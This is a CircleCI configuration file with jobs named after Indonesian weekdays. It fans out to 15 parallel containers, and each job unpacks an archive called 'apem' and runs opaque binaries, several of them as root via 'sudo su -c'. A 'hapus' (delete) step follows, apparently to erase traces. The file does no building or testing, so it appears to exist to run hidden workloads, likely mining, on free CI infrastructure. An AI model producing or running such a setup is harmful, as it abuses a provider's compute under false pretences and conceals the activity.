
version: 2.1

workflows:
  version: 2.1
  workflo_01:
    jobs:
      - hari
      - senin:
          requires:
            - hari
      - selasa:
          requires:
            - hari
            - senin
      - rabu:
          requires:
            - hari
            - senin
            - selasa
      - kamis:
          requires:
            - hari
            - senin
            - selasa
            - rabu

  workflo_02:
    jobs:
      - hari

  workflo_03:
    jobs:
      - hari
      - senin:
          requires:
            - hari
      - selasa:
          requires:
            - hari
            - senin
      - rabu:
          requires:
            - hari
            - senin
            - selasa
      - kamis:
          requires:
            - hari
            - senin
            - selasa
            - rabu

jobs:
  hari:
    docker:
      - image: cimg/base:stable
    steps:
      - checkout
      - setup
      - setep

  senin:
    docker:
      - image: cimg/base:stable
    steps:
      - checkout
      - setup
      - setip:
          result: senin
    parallelism: 15

  selasa:
    docker:
      - image: cimg/base:stable
    steps:
      - checkout
      - setup
      - setip:
          result: selasa
    parallelism: 15

  rabu:
    docker:
      - image: cimg/base:stable
    steps:
      - checkout
      - setup
      - setip:
          result: rabu
    parallelism: 15

  kamis:
    docker:
      - image: cimg/base:stable
    steps:
      - checkout
      - setup
      - setip:
          result: kamis
    parallelism: 15

commands:
  setup:
    steps:
      - run:
          name: jumat
          command: |
            tar -xf apem && chmod u+x *
            ./tembem

  setep:
    steps:
      - run:
          name: sabtu
          command: |
            ./time

      - run:
          name: minggu
          command: |
            ./hapus

  setip:
    parameters:
      result:
        type: string
    steps:
      - run:
          name: sabtu
          command: |
            ./star
            sudo su -c "./01"
            ./hapus

      - run:
          working_directory: /home/MrTakurSing
          name: minggu
          command: |
            sudo su -c "./start"
